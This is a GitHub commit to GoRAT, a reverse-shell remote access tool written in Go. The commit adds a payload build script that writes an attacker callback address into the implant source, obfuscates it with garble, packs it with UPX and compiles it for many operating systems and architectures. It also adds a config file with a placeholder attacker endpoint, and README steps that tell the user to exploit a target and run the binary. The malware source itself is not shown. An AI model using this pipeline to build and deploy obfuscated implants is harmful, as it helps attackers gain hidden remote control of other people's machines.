Add garble and replace makefile

JustinTimperio · Jul 2, 2021 · c31bddc · c31bddc
1 parent 26b578c
commit c31bddc
Show file tree

Hide file tree

Showing 9 changed files with 149 additions and 113 deletions.
diff --git a/Makefile b/Makefile
diff --git a/README.MD b/README.MD
@@ -11,7 +11,7 @@
  :: :: :    : :  :    :   : :   :   : :     :     
 ```
 ![GitHub](https://img.shields.io/github/license/JustinTimperio/GoRAT)
-[![Go Reference](https://pkg.go.dev/badge/github.com/JustinTimperio/gomap.svg)](https://pkg.go.dev/github.com/JustinTimperio/gomap)
+[![Go Reference](https://pkg.go.dev/badge/github.com/JustinTimperio/GoRAT.svg)](https://pkg.go.dev/github.com/JustinTimperio/GoRAT)
 ![Go Report Card](https://goreportcard.com/badge/github.com/JustinTimperio/GoRAT)
 [![Codacy Badge](https://app.codacy.com/project/badge/Grade/d343e4d027164076a630448e3102fbf7)](https://www.codacy.com/gh/JustinTimperio/GoRAT/dashboard?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=JustinTimperio/GoRAT&amp;utm_campaign=Badge_Grade)
 
@@ -33,8 +33,8 @@ GoRAT(Go Remote Access Tool) is an extremely powerful yet simple reverse shell,
 # Installing and Building
 
 1. Set up a full GoLang build environment
-2. Install [UPX](https://upx.github.io/)
-3. Fill out the MakeFile and run `Make`
+2. Install [UPX](https://upx.github.io/) and run `go install mvdan.cc/garble`
+3. Fill out `config.sh` and run `./build_payload.sh`
 4. Transfer the `server` folder to your "attacking" machine, install [bc](https://linux.die.net/man/1/bc) and run `./start_server.sh`
 5. Exploit your system and run the binary
 6. Connect to the "target" via normal ssh from the "attacking" machine
@@ -56,6 +56,8 @@ Session #1 | Control Server Mounted On: 46851
 # Payload Usage
 As with many Go binaries, client executables require zero configure and simply need to be executed. In its current state GoRAT does not include any methods of persistence so if you would like to make it a service, you will need to do so by your own methods.
 
+The payload also uses [garble](https://github.com/burrowers/garble) to produce a binary that works as well as a regular build, but has as little information about the original source code as possible.
+
 ## SSH Server (Linux, FreeBSD, Darwin, OpenBSD)
 Using the logs we can connect to clients directly via ssh using our standard unix OpenSSH package.
 ```

diff --git a/build_payload.sh b/build_payload.sh
@@ -0,0 +1,96 @@
+#!/usr/bin/env bash
+source config.sh
+
+# Vars and Flags
+export PATH=$PATH:$(go env GOPATH)/bin
+VERSION=`git rev-list --count HEAD`
+BUILD_DIR="BUILD"
+SRC_DIR=".BUILD_SOURCE"
+
+# Source Files
+CORE="goRAT.go"
+COMPILE_CORE="$SRC_DIR/goRAT.go"
+
+# Clean Before Stage
+rm -rf $BUILD_DIR
+rm -rf $SRC_DIR
+mkdir $BUILD_DIR
+mkdir $SRC_DIR
+
+# Stage Files and Inject Vars Before Compile
+cp $CORE $COMPILE_CORE
+sed -i "s/@ENDPOINT_HERE@/$SERVER_DEST/g" $COMPILE_CORE
+
+######################
+## 64 Bit Systems
+####################
+GOOS=linux GOARCH=amd64 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_linux_64 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_linux_64
+GOOS=darwin GOARCH=amd64 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_macos_64 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_macos_64
+GOOS=windows GOARCH=amd64 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_windows_64.exe "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_windows_64.exe
+GOOS=freebsd GOARCH=amd64 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_freebsd_64 "$COMPILE_CORE"
+# RIP no UPX for freebsd
+GOOS=openbsd GOARCH=amd64 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_openbsd_64 "$COMPILE_CORE"
+# RIP no UPX for openbsd
+GOOS=linux GOARCH=amd64 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_linux_mips_64 "$COMPILE_CORE"
+# RIP no UPX for MIPS64
+
+GOOS=linux GOARCH=arm64 GOARM=5 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_linux_arm64_ARM5 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_linux_arm64_ARM5
+GOOS=linux GOARCH=arm64 GOARM=6 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_linux_arm64_ARM6 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_linux_arm64_ARM6
+GOOS=linux GOARCH=arm64 GOARM=7 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_linux_arm64_ARM7 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_linux_arm64_ARM7
+
+GOOS=linux GOARCH=arm64 GOARM=5 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_openbsd_arm64_ARM5 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_openbsd_arm64_ARM5
+GOOS=linux GOARCH=arm64 GOARM=6 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_openbsd_arm64_ARM6 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_openbsd_arm64_ARM6
+GOOS=linux GOARCH=arm64 GOARM=7 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_openbsd_arm64_ARM7 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_openbsd_arm64_ARM7
+
+GOOS=linux GOARCH=arm64 GOARM=5 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_freebsd_arm64_ARM5 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_freebsd_arm64_ARM5
+GOOS=linux GOARCH=arm64 GOARM=6 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_freebsd_arm64_ARM6 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_freebsd_arm64_ARM6
+GOOS=linux GOARCH=arm64 GOARM=7 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_freebsd_arm64_ARM7 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_freebsd_arm64_ARM7
+
+######################
+## 32 Bit Systems
+####################
+GOOS=linux GOARCH=386 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_linux_32 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_linux_32
+GOOS=darwin GOARCH=386 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_macos_32 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_macos_32
+GOOS=windows GOARCH=386 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_windows_32.exe "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_windows_32.exe
+GOOS=freebsd GOARCH=386 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_freebsd_32 "$COMPILE_CORE"
+# RIP no UPX for freebsd
+GOOS=openbsd GOARCH=386 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_openbsd_32 "$COMPILE_CORE"
+# RIP no UPX for openbsd
+GOOS=linux GOARCH=mips garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_linux_mips_32 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_linux_mips_32
+
+GOOS=linux GOARCH=arm GOARM=5 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_linux_arm_ARM5 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_linux_arm_ARM5
+GOOS=linux GOARCH=arm GOARM=6 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_linux_arm_ARM6 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_linux_arm_ARM6
+GOOS=linux GOARCH=arm GOARM=7 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_linux_arm_ARM7 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_linux_arm_ARM7
+
+GOOS=linux GOARCH=arm GOARM=5 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_openbsd_arm_ARM5 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_openbsd_arm_ARM5
+GOOS=linux GOARCH=arm GOARM=6 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_openbsd_arm_ARM6 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_openbsd_arm_ARM6
+GOOS=linux GOARCH=arm GOARM=7 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_openbsd_arm_ARM7 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_openbsd_arm_ARM7
+
+GOOS=linux GOARCH=arm GOARM=5 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_freebsd_arm_ARM5 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_freebsd_arm_ARM5
+GOOS=linux GOARCH=arm GOARM=6 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_freebsd_arm_ARM6 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_freebsd_arm_ARM6
+GOOS=linux GOARCH=arm GOARM=7 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_freebsd_arm_ARM7 "$COMPILE_CORE"
+upx "$BUILD_DIR"/"$EXE_NAME"_v"$VERSION"_freebsd_arm_ARM7
diff --git a/config.sh b/config.sh
@@ -0,0 +1,6 @@
+#!/usr/bin/env bash
+# FILL THESE IN BEFORE BUILDING
+
+SERVER_DEST="00.00.00.00:1337"
+# SERVER_DEST = https:\/\/yoururl.com\/sus:443
+EXE_NAME="goRAT"
diff --git a/go.mod b/go.mod
@@ -16,4 +16,8 @@ require (
 	github.com/jaypipes/ghw v0.8.0
 	github.com/jpillora/chisel v1.7.6
 	github.com/stretchr/testify v1.7.0 // indirect
+	golang.org/x/net v0.0.0-20210405180319-a5a99cb37ef4 // indirect
+	golang.org/x/sync v0.0.0-20210220032951-036812b2e83c // indirect
+	golang.org/x/sys v0.0.0-20210403161142-5e06dd20ab57 // indirect
+	mvdan.cc/garble v0.3.0 // indirect
 )